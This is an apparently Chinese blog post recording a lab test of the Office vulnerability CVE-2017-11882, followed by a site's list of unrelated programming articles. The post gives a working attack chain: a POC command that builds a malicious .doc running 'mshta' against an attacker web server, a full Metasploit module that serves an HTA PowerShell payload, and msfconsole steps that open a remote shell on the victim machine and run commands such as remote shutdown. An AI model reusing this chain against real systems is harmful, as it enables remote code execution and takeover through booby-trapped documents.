Office隱藏17年的漏洞CVE_2017_11882測試記錄

来源:http://www.cnblogs.com/lxmwb/archive/2017/11/25/7894742.html
-Advertisement-
Play Games

打開文檔變肉雞:潛伏17年的“噩夢公式”Office漏洞攻擊分析 微軟的11月份的安全補丁包含了一個隱藏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882),該漏洞影響目前所有流行的Office軟體。 ...


 

Office隱藏17年的漏洞CVE_2017_11882測試記錄

創建時間: 2017/11/25 0:18
作者: CN_Simo
標簽: Office漏洞

 

參考文章1:https://www.cnblogs.com/Oran9e/p/7880832.html 參考文章2:https://www.cnblogs.com/i-honey/p/7885573.html   POC地址:https://github.com/Ridter/CVE-2017-11882/   中間環節出現,msf連接資料庫失敗的情況,解決方法:https://www.cnblogs.com/justforfun12/p/5205804.html   1.製造條件     這裡搭建兩台虛擬機進行測試!   測試機配置信息:  
操作系統 Win7_x64 企業版
Office版本 Office 2013
防火牆狀態 開啟
IP 192.168.1.103
系統語言 Chinese
   
操作系統 Kali 2.1 中文
IP 192.168.1.104
  首先在kali下安裝nginx,或者tomcat應該也是可以的,首先將生成的doc文件放在/usr/share/nginx/html目錄下,方便被攻擊的機器獲取doc文件。   啟動nginx服務:systemctl start nginx   使用Command43b_CVE-2017-11882.py生成doc文件 python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.104:8080/abc";; -o cev2.doc # 將下載好的漏洞模塊放在msf任意目錄下 root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ cve_2017_11882.rb的內容如下: ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule  < Msf::Exploit::Remote   Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer   def initialize(info  = {})     super(update_info(info,       'Name' => 'Microsoft Office Payload Delivery',       'Description' => %q{         This module generates an command to place within         a word document, that when executed, will retrieve a HTA payload         via HTTP from an web server. Currently have not figured out how         to generate a doc.       },       'License' => MSF_LICENSE,       'Arch' => ARCH_X86,       'Platform' => 'win',       'Targets' =>         [           ['Automatic', {} ],         ],       'DefaultTarget' => 0,     ))   end   def on_request_uri(cli, _request)     print_status("Delivering payload")     p = regenerate_payload(cli)     data = Msf::Util::EXE.to_executable_fmt(       framework,       ARCH_X86,       'win',       p.encoded,       'hta-psh',       { :arch => ARCH_X86, :platform => 'win '}     )     send_response(cli, data, 'Content-Type' => 'application/hta')   end   def primer     url = get_uri     print_status("Place the following DDE in an MS document:")     print_line("mshta.exe \"#{url}\"")   end   然後,這裡在使用msfconsole之前,需要先打開資料庫,例如 service postgresql start  打開資料庫之後,進入msfconsole,然後對msf進行初始化,執行msf init 之後search cve_2017_11882搜索漏洞模塊,然後按照【參考文章2】進行配置,最後 exploit 之後啟動對 8080 埠的監聽,至於為什麼是8080埠我也不太清楚啊!   2.萬事俱備,只欠東風   這個時候,只需要在 win7 上通過瀏覽器的到 cve2.doc文檔,打開之後,kali中命令行立刻顯示已經獲取到了連接, session命令得到回話,session -i 【id】建立連接 shell命令可以得到cmd,執行net user查看用戶   3.實驗效果   通過這個漏洞,可以肆無忌憚的執行一些命令,例如關機,刪除一些文件,收集一些系統信息還是非常有用的 在桌面新建文件夾 遠程關機 雖然獲取到了命令行,但是通過net user命令可以看到登錄的用戶級別是Guest,這就限制了一些需要許可權較高的命令執行! 而且這裡win7沒有安裝殺軟,我不知道安裝殺軟之後word文檔會不會被查殺呢?  

 


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 面向對象與原型
    說真的,學習JavaScript時,面向對象與原型這章特別考驗你的編程基礎能力,邏輯性很強,初學時,整個人都是懵逼的狀態,現在依然有點,每個函數的封裝方式都是從缺點最多的寫法進入,再一步一步深入,不斷優化函數,最終,使得自己寫出的函數能夠代碼精簡,並且相容性好,下麵我就分享下最基礎的工廠模式吧!(創 ...
  • vue日誌demo,增刪改查的練習(無vuex版本)
    安裝 1. 確定電腦已裝node和npm 出現版本號則說明電腦已經安裝好node和npm2. 創建一個基於webpack的項目 3. 在項目里安裝依賴 4. 運行 配置路由為了動態渲染各個頁面的組件,這個是必須的,這些都在router文件夾里的index.js配置好,在components文件夾在下 ...
  • 記CSS格式化上下文
    fomatting context 引言 主要講解的是BFC上下文 本文是查看 "史上最全面、最透徹的BFC原理剖析" 的筆記 所以不會詳解BFC, 只是記錄學習心得, 以及重要規則避免原文失效 簡介 Formatting context是W3C CSS2.1規範中的一個概念。它是頁面中的一塊渲染區 ...
  • window環境下npm install node-sass報錯
    最近準備想用vue-cli初始化一個項目,需要sass-loader編譯; 發現window下npm install node-sass和sass-loader一直報錯, window 命令行中提示我全局安裝 node-gyp ,有些提示好像是本地找不到python, 於是我按照提示安裝node-g ...
  • iOS-PYSearch完美搜索頁
    APP搜索頁基本上是少不了的,熱門搜索、搜索記錄等;這裡推薦一個大牛ko1o寫的:PYSearch,他還有一個不錯的圖片瀏覽開源:PYPhotoBrowser;這個也不錯,感興趣的可以瞭解下;下麵說下PYSearch的主要功能及(原Gitdemo)效果; 熱門搜索風格 PYHotSearchStyl ...
  • 【代碼筆記】iOS-HTTPQueue下載圖片
    一,工程圖。 二,代碼。 ViewController.h ViewController.m ...
  • 2017.11.25 中斷與數位管動態顯示
    數組基本概念: 1、具有相同的數據類型 2、具有相同的名字 3、在存儲器中的存儲是連續的 註意:區分數組下標和數組元素個數的概念,數組下標可以是常量或變數,數組賦值只能在初始化進行,程式只能進行單個元素賦值。 switch() { case 常量表達式1: 語句1;break; default 常量 ...
  • Linux入門基礎篇
    Linux入門基礎篇 Linux誕生 Linux發行版本說明 Linux官方網站 Linux內核官方網站 比較有名的Linux發行版 虛擬機(Virtual Machine),一個虛擬的系統,安裝在系統中的系統 Linux與Windows的不同 Linux基本命令入門 Windows命令行入門(搜索 ...
一周排行
    -Advertisement-
    Play Games
  • C# + WPF 音頻播放器 界面優雅,體驗良好
    前言 本文介紹一款使用 C# 與 WPF 開發的音頻播放器,其界面簡潔大方,操作體驗流暢。該播放器支持多種音頻格式(如 MP4、WMA、OGG、FLAC 等),並具備標記、實時歌詞顯示等功能。 另外,還支持換膚及多語言(中英文)切換。核心音頻處理採用 FFmpeg 組件,獲得了廣泛認可,目前 Git ...
  • OAuth2.0授權-gitee授權碼模式
    OAuth2.0授權驗證-gitee授權碼模式 本文主要介紹如何筆者自己是如何使用gitee提供的OAuth2.0協議完成授權驗證並登錄到自己的系統,完整模式如圖 1、創建應用 打開gitee個人中心->第三方應用->創建應用 創建應用後在我的應用界面,查看已創建應用的Client ID和Clien ...
  • FastReport.OpenSource .Net下開源免費報表列印組件
    解決了這個問題:《winForm下,fastReport.net 從.net framework 升級到.net5遇到的錯誤“Operation is not supported on this platform.”》 本文內容轉載自:https://www.fcnsoft.com/Home/Sho ...
  • 如何在 ASP.NET Core Web API 方法執行前後 “偷偷“ 作一些 “壞“ 事?初識 ActionFilterAttribute
    國內文章 WPF 從裸 Win 32 的 WM_Pointer 消息獲取觸摸點繪製筆跡 https://www.cnblogs.com/lindexi/p/18390983 本文將告訴大家如何在 WPF 裡面,接收裸 Win 32 的 WM_Pointer 消息,從消息裡面獲取觸摸點信息,使用觸摸點 ...
  • 在 ASP.NET Core Web API 中使用異常篩選器捕獲和統一處理異常
    前言 給大家推薦一個專為新零售快消行業打造了一套高效的進銷存管理系統。 系統不僅具備強大的庫存管理功能,還集成了高性能的輕量級 POS 解決方案,確保頁面載入速度極快,提供良好的用戶體驗。 項目介紹 Dorisoy.POS 是一款基於 .NET 7 和 Angular 4 開發的新零售快消進銷存管理 ...
  • AbpHelper CLI積累與實戰分享
    ABP CLI常用的代碼分享 一、確保環境配置正確 安裝.NET CLI: ABP CLI是基於.NET Core或.NET 5/6/7等更高版本構建的,因此首先需要在你的開發環境中安裝.NET CLI。這可以通過訪問Microsoft官網下載並安裝相應版本的.NET SDK來實現。 安裝ABP ...
  • 記一次HttpClient使用問題分析
    問題 問題是這樣的:第三方的webapi,需要先調用登陸介面獲取Cookie,訪問其它介面時攜帶Cookie信息。 但使用HttpClient類調用登陸介面,返回的Headers中沒有找到Cookie信息。 分析 首先,使用Postman測試該登陸介面,正常返回Cookie信息,說明是HttpCli ...
  • .NET周刊【9月第3期 2024-09-15】
    國內文章 關於.NET在中國為什麼工資低的分析 https://www.cnblogs.com/thinkingmore/p/18406244 .NET在中國開發者的薪資偏低,主要因市場需求、技術棧選擇和企業文化等因素所致。歷史上,.NET曾因微軟的閉源策略發展受限,儘管後來推出了跨平臺的.NET ...
  • 我的網站集成ElasticSearch初體驗
    在WPF開發應用中,動畫不僅可以引起用戶的註意與興趣,而且還使軟體更加便於使用。前面幾篇文章講解了畫筆(Brush),形狀(Shape),幾何圖形(Geometry),變換(Transform)等相關內容,今天繼續講解動畫相關內容和知識點,僅供學習分享使用,如有不足之處,還請指正。 ...
  • 第23篇 委托的概述
    什麼是委托? 委托可以說是把一個方法代入另一個方法執行,相當於指向函數的指針;事件就相當於保存委托的數組; 1.實例化委托的方式: 方式1:通過new創建實例: public delegate void ShowDelegate(); 或者 public delegate string ShowDe ...
所有分類